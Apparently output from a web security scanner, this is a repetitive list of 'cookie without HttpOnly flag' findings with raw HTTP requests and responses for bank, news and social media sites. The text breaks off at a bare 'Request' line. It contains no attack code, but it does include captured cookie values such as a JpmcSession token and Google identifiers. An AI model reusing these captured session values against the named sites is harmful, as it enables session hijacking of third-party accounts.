HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 22:17:37 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Set-Cookie: HiddenPopup=popup=False; path=/ Set-Cookie: HiddenError=error=False; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 17351
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta id="ctl00_ ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /trufitstudentloan/ HTTP/1.1 Host: www.citizensbank.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 22:39:55 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Cache-Control: public Expires: Wed, 02 Feb 2011 22:49:48 GMT Vary: * Content-Type: text/html; charset=utf-8 Content-Length: 47626
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta id="ctl00_obj ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
CG=US:TX:Dallas; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /2011/TECH/web/01/28/egypt.internet.shutdown/index.html HTTP/1.1 Host: www.cnn.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 01:06:34 GMT Server: Apache Set-Cookie: CG=US:TX:Dallas; path=/ Accept-Ranges: bytes Cache-Control: max-age=60, private Expires: Thu, 03 Feb 2011 01:07:34 GMT Content-Type: text/html Vary: Accept-Encoding,User-Agent Content-Length: 57590 Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html lang="en"><head><script type="text/javascript" src="http://i.cdn.turner.com/cnn/.element/js/ ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /software/slimbox HTTP/1.1 Host: www.digitalia.be Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /latest-news/science-a-environmental/21129-world-renowned-chefs-join-call-to-boycott-bluefin-.html HTTP/1.1 Host: www.enewspf.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 01:06:40 GMT Server: Apache X-Powered-By: PHP/5.2.14 Set-Cookie: 15ec327c47efbc617f0bc517ff137074=lencdd7511juth6361pib24dj1; path=/ P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: ja_teline_iii_tpl=ja_teline_iii; expires=Tue, 24-Jan-2012 01:06:40 GMT; path=/ Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Thu, 03 Feb 2011 01:06:41 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 69019
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns="http://www.w3.org/19 ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
lsd=41jA_; path=/; domain=.facebook.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /2008/fbml HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;
Response
HTTP/1.1 404 Not Found Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=41jA_; path=/; domain=.facebook.com Content-Type: text/html; charset=utf-8 Connection: close Date: Thu, 03 Feb 2011 01:06:40 GMT Content-Length: 11422
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class= ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.filamentgroup.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The following cookie was issued by the application and does not have the HttpOnly flag set:
v1st=49DB682DE70C7979; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.firstusa.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xcards4/common/weblinking/weblinking.html HTTP/1.1 Host: www.firstusa.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Thu, 03 Feb 2011 01:06:46 GMT Content-length: 5936 Content-type: text/html Set-Cookie: v1st=49DB682DE70C7979; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.firstusa.com Last-modified: Thu, 16 Dec 2010 13:58:38 GMT Etag: "1730-4d0a1b0e" Accept-ranges: bytes Connection: close
<html><head><title>Important Information on Weblinking from Chase</title> <link href="http://www.bankone.com/bolStyle.css" rel="stylesheet" type="text/css"> <SCRIPT Language="javascript" TYPE="text/j ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /finance HTTP/1.1 Host: www.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NID=43=b047N2rzcR5j1zMXEpdBo2hh5YJB0tHWlhpnTZC6sE2E0oKhqTIEWj3h1ndW_KVGzksu8DQxWwRLNl-jwmZDSNcoUTAIqVM648JqycJB7IgDEPB9m0hMSeKNwBC3xa69; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /setprefs?sig=0_wmOEOqCEugI_DX4CRMM9-gOiSPQ=&suggon=2&prev=http://www.google.com/search%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dipboard%2Bsoftware HTTP/1.1 Host: www.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NID=43=b047N2rzcR5j1zMXEpdBo2hh5YJB0tHWlhpnTZC6sE2E0oKhqTIEWj3h1ndW_KVGzksu8DQxWwRLNl-jwmZDSNcoUTAIqVM648JqycJB7IgDEPB9m0hMSeKNwBC3xa69; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;
<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"> <TITLE>302 Moved</TITLE></HEAD><BODY> <H1>302 Moved</H1> The document has moved <A HREF="http://www.google.com/search?sou ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
GALX=-qUnohNObFQ;Path=/accounts;Secure
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /accounts/Login HTTP/1.1 Host: www.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NID=43=b047N2rzcR5j1zMXEpdBo2hh5YJB0tHWlhpnTZC6sE2E0oKhqTIEWj3h1ndW_KVGzksu8DQxWwRLNl-jwmZDSNcoUTAIqVM648JqycJB7IgDEPB9m0hMSeKNwBC3xa69; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;
The following cookie was issued by the application and does not have the HttpOnly flag set:
GALX=DLDUrVQYtAM;Path=/accounts;Secure
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /accounts/ServiceLogin HTTP/1.1 Host: www.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NID=43=b047N2rzcR5j1zMXEpdBo2hh5YJB0tHWlhpnTZC6sE2E0oKhqTIEWj3h1ndW_KVGzksu8DQxWwRLNl-jwmZDSNcoUTAIqVM648JqycJB7IgDEPB9m0hMSeKNwBC3xa69; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /business/2011/jan/11/offshore-oil-industry-white-house HTTP/1.1 Host: www.guardian.co.uk Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 01:15:50 GMT Server: Apache X-GU-jas: 07-16121 X-GU-PageRenderer: DefaultPageRenderer Content-Language: en Content-Type: text/html; charset=UTF-8 Set-Cookie: GU_MU=VFVvQnhRcjZERHdBQUNoYlFSUUFBQUJafEkxMytueWM9; path=/; domain=.guardian.co.uk; expires=Sun, 31-Jan-2021 01:15:49 GMT Set-Cookie: GU_LOCATION=dXNhOjU6dHg6NDpkYWxsYXM6Mzo2MjM6YnJvYWRiYW5kOiAzMi43ODc6LTk2Ljc5OUA0NzI1NDI3MTgzMTgzMjE1MjMzMTk3MTM1OTcyNjIyMTAxNzUyOQ==; path=/; domain=.guardian.co.uk; expires=Thu, 24-Feb-2011 01:15:49 GMT Vary: Accept-Encoding,User-Agent X-GU-httpd: 03 P3P: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa CONa TELa OUR IND ONLi UNI PURi NAV STA PRE LOC" Connection: close Content-Length: 98316
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" l ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.ibsnetaccess.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<HTML> <HEAD> <TITLE>FIA Card Services Net Access</TITLE> <META NAME = "Keywords" CONTENT = "FIA Card Services, FIA card services, net access, FIA Card Services Net Access, FIA card services ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /css/lightview.css HTTP/1.1 Host: www.jpmorgan.com Proxy-Connection: keep-alive Referer: http://www.jpmorgan.com/pages/jpmorgan Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405
Response
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT Date: Wed, 02 Feb 2011 22:29:44 GMT Server: Apache Last-Modified: Wed, 04 Aug 2010 00:40:29 GMT ETag: "8e70c-2560-ae2df940" Accept-Ranges: bytes Content-Length: 9568 P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Type: text/css
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /emetrics/s_code.js HTTP/1.1 Host: www.jpmorgan.com Proxy-Connection: keep-alive Referer: http://www.jpmorgan.com/pages/jpmorgan Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405
Response
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT Date: Wed, 02 Feb 2011 22:30:11 GMT Server: Apache Last-Modified: Fri, 12 Nov 2010 20:44:49 GMT ETag: "188c2-9b4f-29579240" Accept-Ranges: bytes Content-Length: 39759 P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Type: application/x-javascript
/* SiteCatalyst code version: H.21. Copyright 1996-2010 Adobe, Inc. All Rights Reserved. More info available at http://www.omniture.com */ /* Report suite for J.P. Morgan site */
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /favicon.ico HTTP/1.1 Host: www.jpmorgan.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; s_cc=true; s_sq=%5B%5BB%5D%5D; ACE_COOKIE=R2666079405
Response
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT Date: Wed, 02 Feb 2011 22:30:24 GMT Server: Apache Last-Modified: Mon, 18 Aug 2008 20:30:58 GMT ETag: "47c5-37e-d94d8480" Accept-Ranges: bytes Content-Length: 894 P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Type: text/plain
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/bkgrd_container_2008.jpg HTTP/1.1 Host: www.jpmorgan.com Proxy-Connection: keep-alive Referer: http://www.jpmorgan.com/pages/jpmorgan Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405
Response
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT Date: Wed, 02 Feb 2011 22:30:11 GMT Server: Apache Last-Modified: Fri, 08 Aug 2008 13:36:34 GMT ETag: "72aba-5958-e4e13c80" Accept-Ranges: bytes Content-Length: 22872 P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Type: image/jpeg
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/client_pixel.jpg HTTP/1.1 Host: www.jpmorgan.com Proxy-Connection: keep-alive Referer: http://www.jpmorgan.com/pages/jpmorgan Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405
Response
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT Date: Wed, 02 Feb 2011 22:30:17 GMT Server: Apache Last-Modified: Wed, 16 Jul 2008 21:50:44 GMT ETag: "72abb-156-1dceb500" Accept-Ranges: bytes Content-Length: 342 P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Type: image/jpeg
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/dotted_line.jpg HTTP/1.1 Host: www.jpmorgan.com Proxy-Connection: keep-alive Referer: http://www.jpmorgan.com/pages/jpmorgan Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405
Response
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT Date: Wed, 02 Feb 2011 22:30:12 GMT Server: Apache Last-Modified: Thu, 07 Aug 2008 20:48:02 GMT ETag: "72ac1-469-ce156480" Accept-Ranges: bytes Content-Length: 1129 P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Type: image/jpeg
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/headers/hdr_client_logon_2008.jpg HTTP/1.1 Host: www.jpmorgan.com Proxy-Connection: keep-alive Referer: http://www.jpmorgan.com/pages/jpmorgan Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405
Response
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT Date: Wed, 02 Feb 2011 22:30:16 GMT Server: Apache Last-Modified: Wed, 16 Jul 2008 21:13:58 GMT ETag: "6617e-548-9a51d180" Accept-Ranges: bytes Content-Length: 1352 P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Type: image/jpeg
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/headers/hdr_news.jpg HTTP/1.1 Host: www.jpmorgan.com Proxy-Connection: keep-alive Referer: http://www.jpmorgan.com/pages/jpmorgan Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405
Response
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT Date: Wed, 02 Feb 2011 22:30:17 GMT Server: Apache Last-Modified: Wed, 16 Jul 2008 21:13:58 GMT ETag: "6617d-9cb-9a51d180" Accept-Ranges: bytes Content-Length: 2507 P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Type: image/jpeg
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/homepage/2008_flash/img/home_corporations.jpg HTTP/1.1 Host: www.jpmorgan.com Proxy-Connection: keep-alive Referer: http://www.jpmorgan.com/pages/jpmorgan Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405
Response
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT Date: Wed, 02 Feb 2011 22:30:14 GMT Server: Apache Last-Modified: Sat, 18 Apr 2009 06:25:37 GMT ETag: "32aa92-1918-5d889a40" Accept-Ranges: bytes Content-Length: 6424 P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Type: image/jpeg
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/homepage/2008_flash/img/home_fininst.jpg HTTP/1.1 Host: www.jpmorgan.com Proxy-Connection: keep-alive Referer: http://www.jpmorgan.com/pages/jpmorgan Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405
Response
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT Date: Wed, 02 Feb 2011 22:30:14 GMT Server: Apache Last-Modified: Sat, 18 Apr 2009 06:25:37 GMT ETag: "32aa93-22ba-5d889a40" Accept-Ranges: bytes Content-Length: 8890 P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Type: image/jpeg
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/homepage/2008_flash/img/home_individuals.jpg HTTP/1.1 Host: www.jpmorgan.com Proxy-Connection: keep-alive Referer: http://www.jpmorgan.com/pages/jpmorgan Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405
Response
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT Date: Wed, 02 Feb 2011 22:30:15 GMT Server: Apache Last-Modified: Sat, 18 Apr 2009 06:25:37 GMT ETag: "32aa96-1a1c-5d889a40" Accept-Ranges: bytes Content-Length: 6684 P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Type: image/jpeg
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
